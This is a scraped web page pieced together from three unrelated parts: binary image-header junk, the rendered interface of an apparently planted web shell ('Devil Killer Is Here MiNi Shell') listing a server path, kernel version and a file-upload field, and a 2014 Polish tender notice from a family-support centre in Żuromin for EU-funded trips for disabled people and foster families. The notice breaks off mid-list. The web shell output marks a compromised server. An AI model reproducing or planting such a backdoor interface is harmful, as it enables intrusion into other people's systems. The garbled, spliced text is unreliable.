JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140514/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140514/162664-N-2014.html

<p class="kh_header"><b>Żuromin: Świadczenie kompleksowej usługi polegającej na zorganizowaniu wyjazdów dla Uczestników Projektu systemowego Równe Szanse współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 162664 - 2014; data zamieszczenia: 14.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. Lidzbarska 27, 09-300 Żuromin, woj. mazowieckie, tel. 0-23 657 35 15, faks 0-23 657 35 15.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://pcpr-zuromin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie kompleksowej usługi polegającej na zorganizowaniu wyjazdów dla Uczestników Projektu systemowego Równe Szanse współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część 1: Świadczenie kompleksowej usługi polegającej na zorganizowaniu 10 dniowego wyjazdu dla 10 osób niepełnosprawnych w ramach którego prowadzone będzie doradztwo zawodowe
i poradnictwo psychologiczne, przeprowadzone zostanie szkolenie zawodowe - 
Kurs komputerowy, oraz prowadzone będą zabiegi rehabilitacyjne w ramach realizacji projektu systemowego Równe Szanse współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - Priorytet VII. Promocja integracji społecznej, Działanie 7.1. Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie
Część 2: Świadczenie kompleksowej usługi polegającej na zorganizowaniu 6 dniowego wyjazdu dla 19  osób niepełnosprawnych intelektualnie wraz z 2 opiekunami w ramach którego prowadzone będą warsztaty kompetencji społeczno zawodowych polegających na przeprowadzeniu kursu rękodzieła- artystyczne wyroby z filcu połączonego z doradztwem zawodowym, poradnictwem psychologicznym oraz  zabiegami  rehabilitacyjnymi w ramach realizacji projektu systemowego Równe Szanse współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - Priorytet VII. Promocja integracji społecznej, Działanie 7.1. Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie
Część 3: Świadczenie kompleksowej usługi polegającej na zorganizowaniu 6- dniowego wyjazdu dla 15 osób- członków rodzin zastępczych i 1 opiekuna, w ramach którego prowadzone będą warsztaty i poradnictwo psychologiczne dla rodziców zastępczych i  wychowanków rodzin zastępczych jako ich otoczenia  w ramach realizacji projektu systemowego Równe Szanse współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - Priorytet VII. Promocja integracji społecznej, Działanie 7.1. Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9, 80.57.00.00-0, 55.32.00.00-9, 55.11.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 09.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że w ciągu 3 ostatnich lat przed upływem terminu składania ofert wykonał, co najmniej 2 kompleksowe usługi polegające na zorganizowaniu wyjazdu, w tym:
a) dla Części I: Każda z wykazanych usług (wyjazdów) musiała być min. 10 dniowa, była zorganizowana dla co najmniej 10 osób niepełnosprawnych zagrożonych wykluczeniem społecznym, w ramach każdej z wykazanych usług przeprowadzono szkolenia zawodowe, warsztaty dotyczące umiejętności i kompetencji społecznych, wraz z zakwaterowaniem, wyżywieniem i zabiegami rehabilitacyjnymi,
b) dla Części II: Każda z wykazanych usług (wyjazdów) musiała być min. 6 dniowa, była zorganizowana dla co najmniej 15 osób niepełnosprawnych intelektualnie, w ramach każdej z wykazanych usług przeprowadzono doradztwo zawodowe, warsztaty dotyczące umiejętności i kompetencji społeczno-zawodowych, wraz z zakwaterowaniem, wyżywieniem i zabiegami rehabilitacyjnymi,
c) dla Części III: Każda z wykazanych usług (wyjazdów) musiała być min. 4 dniowa, była zorganizowany dla co najmniej 15 osób członków rodzin zastępczych, w ramach każdego z wykazanych wyjazdów przeprowadzono warsztaty i poradnictwo psychologiczne dla rodziców zastępczych i  wychowanków rodzin zastępczych, wraz z zakwaterowaniem i wyżywieniem</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że dysponuje, lub będzie dysponował osobami, spełniającymi niżej wymienione wymagania: 
dla Części I:
1. Doradca zawodowy; 1 osoba; Wykształcenie wyższe kierunkowe, lub licencja doradcy zawodowego. Minimum 2 letnie doświadczenie w doradztwie zawodowym lub przeprowadzeniu warsztatów kompetencji zawodowych dla osób niepełnosprawnych.
2. Psycholog; 1 osoba; Wykształcenie wyższe psychologiczne. Co najmniej 2 letnie doświadczenie w świadczeniu usług poradnictwa psychologicznego dla osób niepełnosprawnych.
3. Trener; 1 osoba; Wykształcenie wyższe kierunkowe (informatyczne). Przeprowadził co najmniej 3 szkolenia komputerowe dla osób niepełnosprawnych.
dla Części II:
1. Doradca zawodowy; 1 osoba; Wykształcenie wyższe kierunkowe, lub licencja doradcy zawodowego. Minimum 2 letnie doświadczenie w doradztwie zawodowym lub przeprowadzeniu warsztatów kompetencji zawodowych dla osób niepełnosprawnych intelektualnie.
2. Psycholog; 1 osoba; Wykształcenie wyższe psychologiczne. Co najmniej roczne doświadczenie w świadczeniu usług poradnictwa psychologicznego dla osób niepełnosprawnych intelektualnie.
3. Trener; 1 osoba; Przeprowadził, co najmniej 2 warsztaty z rękodzieła dla osób niepełnosprawnych intelektualnie.
	
dla Części III:
1. Psycholog; 1 osoba; Wykształcenie wyższe psychologiczne. Co najmniej roczne doświadczenie w świadczeniu usług poradnictwa psychologicznego dla członków i wychowanków rodzin zastępczych.
2. Opiekun dzieci; 1 osoba; Wykształcenie wyższe pedagogiczne.
Minimum 2 - letnie doświadczenie w pracy z dziećmi.
3. Psychiatra dziecięcy; 1 osoba; Wykształcenie wyższe medyczne, posiadająca specjalizację we wskazanej dziedzinie. Min. 3-letni staż pracy z dziećmi</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Opis miejsca pobytu (potwierdzający wymagane warunki i standardy).</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Harmonogram wyjazdu uwzględniający wszystkie jego elementy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Doświadczenie wykonawcy - 50</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcpr-zuromin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Żurominie
ul. Lidzbarska 27, 09-300 Żuromin, nr pokoju 25.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.05.2014 godzina 09:00, miejsce: Powiatowe Centrum Pomocy Rodzinie w Żurominie
ul. Lidzbarska 27, 09-300 Żuromin, nr pokoju 25.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane jest w ramach Projektu systemowego Równe Szanse współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - Priorytet VII. Promocja integracji społecznej, Działanie 7.1. Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Świadczenie kompleksowej usługi polegającej na zorganizowaniu 10 dniowego wyjazdu dla 10 osób niepełnosprawnych w ramach którego prowadzone będzie doradztwo zawodowe
i poradnictwo psychologiczne, przeprowadzone zostanie szkolenie zawodowe - 
Kurs komputerowy, oraz prowadzone będą zabiegi rehabilitacyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje: 
1) zapewnienie wykwalifikowanej kadry trenerskiej (w sposób zapewniający ciągłość prowadzonych zajęć - np. w razie konieczności zastępstwo),
a. zapewnienie odpowiednich warunków lokalowych - sala szkoleniowa dostosowana do potrzeb i liczby uczestników, z urządzeniami niezbędnymi do właściwego przeprowadzenia szkolenia, 
2) wyposażenie uczestników w niezbędne materiały szkoleniowe - oznakowane logo  UE i POKL(w tym materiały piśmiennicze) - bezzwrotne, 
3) zapewnienie uczestnikom noclegu na czas trwania szkolenia (9 noclegów),
4) zapewnienie uczestnikom całodobowego wyżywienia na czas trwania szkolenia, 
5) zapewnienie uczestnikom transportu na trasie Żuromin - miejsce szkolenia oraz miejsce szkolenia - Żuromin, zgodnie z obowiązującymi w zakresie przewozu osób przepisami prawa pojazdem dostosowanym do potrzeb osób niepełnosprawnych,
6) ubezpieczenie uczestników od następstw nieszczęśliwych wypadków na czas przejazdu i pobytu,
7) zapewnienie w trakcie dojazdu, pobytu  i powrotu min. 1 opiekuna,
8) opracowanie szczegółowego programu i harmonogramu szkolenia i przedstawienie go Zamawiającemu nie później niż na 7 dni przed rozpoczęciem kursu,
9) prowadzenie dokumentacji kursu (dziennik zajęć, codzienne listy obecności i in.),
10) sporządzenie ankiety ewaluacyjnej przed i po zakończeniu kursu oraz sprawozdania z ich przebiegu,
11) sporządzenie dokumentacji fotograficznej szkolenia (min. 30 zdjęć na płycie CD),
12) oznakowanie miejsca szkolenia oraz wszelkich dokumentów związanych z organizacją szkolenia zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki,
13) zapewnienie uczestnikom organizacji czasu wolnego i właściwej opieki.
- Liczba uczestników szkolenia wynosi 10 osób. 
- Liczba godzin dydaktycznych (45 min.) Kursu komputerowego wynosi min. 25 godz. na osobę. Kurs odbywa się na poziomie rozszerzonym połączonym z elementami grafiki komputerowej i tworzeniem stron internetowych. 
- Doradztwo zawodowe - grupowe, min. 8 godzin/grupę. 
- Poradnictwo psychologiczne - grupowe, min 8 godzin/grupę i indywidualne w liczbie 2 godzin na każdego uczestnika..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9, 80.57.00.00-0, 55.32.00.00-9, 55.11.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Doświadczenie wykonawcy - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Świadczenie kompleksowej usługi polegającej na zorganizowaniu 6 dniowego wyjazdu dla 19  osób niepełnosprawnych intelektualnie wraz z 2 opiekunami w ramach którego prowadzone będą warsztaty kompetencji społeczno zawodowych polegających na przeprowadzeniu kursu rękodzieła- artystyczne wyroby z filcu połączonego z doradztwem zawodowym, poradnictwem psychologicznym oraz  zabiegami  rehabilitacyjnymi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje: 
1)	zapewnienie wykwalifikowanej kadry trenerskiej (w sposób zapewniający ciągłość prowadzonych zajęć - np. w razie konieczności zastępstwo),
a.	zapewnienie odpowiednich warunków lokalowych - sala szkoleniowa dostosowana do potrzeb i liczby uczestników, z urządzeniami niezbędnymi do właściwego przeprowadzenia szkolenia, 
2)	wyposażenie uczestników w niezbędne materiały szkoleniowe (w tym materiały piśmiennicze) - bezzwrotne,
3)	zapewnienie uczestnikom noclegu na czas trwania szkolenia (5 noclegów dla  kobiet i mężczyzn),
4)	zapewnienie uczestnikom całodobowego wyżywienia na czas trwania szkolenia, 
5)	zapewnienie dojazdu i powrotu, noclegu i całodziennego wyżywienia dla 2 opiekunów uczestników
6)	dwa badania lekarskie (wstępne i końcowe)ze wskazaniem odpowiedniej rehabilitacji,
7)	Opiekę medyczną, w tym pielęgniarki i lekarza - opieka medyczna zapewniona w razie potrzeby,   z ewentualnym dowozem do szpitala, leki podstawowe (apteczka, leki przeciwbólowe),
8)	zapewnienie uczestnikom transportu na trasie Żuromin - miejsce szkolenia oraz miejsce szkolenia - Żuromin, zgodnie z obowiązującymi w zakresie przewozu osób przepisami prawa pojazdem dostosowanym do potrzeb osób niepełnosprawnych,
9)	ubezpieczenie uczestników od następstw nieszczęśliwych wypadków na czas przejazdu i pobytu,
10)	prowadzenie dokumentacji kursu (dziennik zajęć, codzienne listy obecności i in.),
11)	sporządzenie ankiety ewaluacyjnej przed i po zakończeniu kursu oraz sprawozdania z ich przebiegu,
12)	sporządzenie dokumentacji fotograficznej szkolenia (min. 30 zdjęć na płycie CD),
13)	oznakowanie miejsca szkolenia oraz wszelkich dokumentów związanych z organizacją szkolenia zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki,
14)	zapewnienie uczestnikom organizacji czasu wolnego i właściwej opieki,
15)	zapewnienie przez wykonawcę w trakcie pobytu min 1 opiekuna,
16)	Wykonawca będzie zobowiązany w trakcie trwania kursu zapewnić warunki zgodne z przepisami BHP.
- Liczba uczestników kursu wynosi 19 osób. 
- Liczba osób uczestniczących w wyjeździe wynosi 21 osób.
- Liczba godzin dydaktycznych (45 min.) kurs rękodzieła - malowanie piaskiem(np. wg wzorów www.wenasc.eu ) wynosi min. 8 godz. na osobę. 
- Doradztwo zawodowe - grupowe, min. 5 godzin zegarowych na grupę. 
- Poradnictwo psychologiczne - grupowe, min. 5 godzin zegarowych na grupę i indywidualne w liczbie 2 godzin na każdego uczestnika.  
- zabiegi rehabilitacyjne - dostosowane do potrzeb uczestników - min. 3 zabiegi dziennie dla każdego uczestnika..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9, 80.57.00.00-0, 55.32.00.00-9, 55.11.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Doświadczenie wykonawcy - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Świadczenie kompleksowej usługi polegającej na zorganizowaniu 6- dniowego wyjazdu dla 15 osób- członków rodzin zastępczych i 1 opiekuna, w ramach którego prowadzone będą warsztaty i poradnictwo psychologiczne dla rodziców zastępczych i  wychowanków rodzin zastępczych jako ich otoczenia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje: 
14)	zapewnienie wykwalifikowanej kadry (w sposób zapewniający ciągłość prowadzonych zajęć - np. w razie konieczności zastępstwo),
a.	zapewnienie odpowiednich warunków lokalowych - sala  dostosowana do potrzeb i liczby uczestników, z urządzeniami niezbędnymi do właściwego przeprowadzenia warsztatów, 
15)	wyposażenie uczestników w niezbędne materiały  (w tym materiały piśmiennicze) - bezzwrotne,
16)	zapewnienie uczestnikom noclegu na czas trwania wyjazdu (5 noclegów dla  8 osób dorosłych i 8 dzieci),
17)	zapewnienie uczestnikom całodobowego wyżywienia na czas trwania wyjazdu, 
18)	zapewnienie uczestnikom transportu na trasie Żuromin - miejsce warsztatów oraz miejsce warsztatów - Żuromin, zgodnie z obowiązującymi w zakresie przewozu osób przepisami 
19)	ubezpieczenie uczestników od następstw nieszczęśliwych wypadków na czas przejazdu i pobytu,
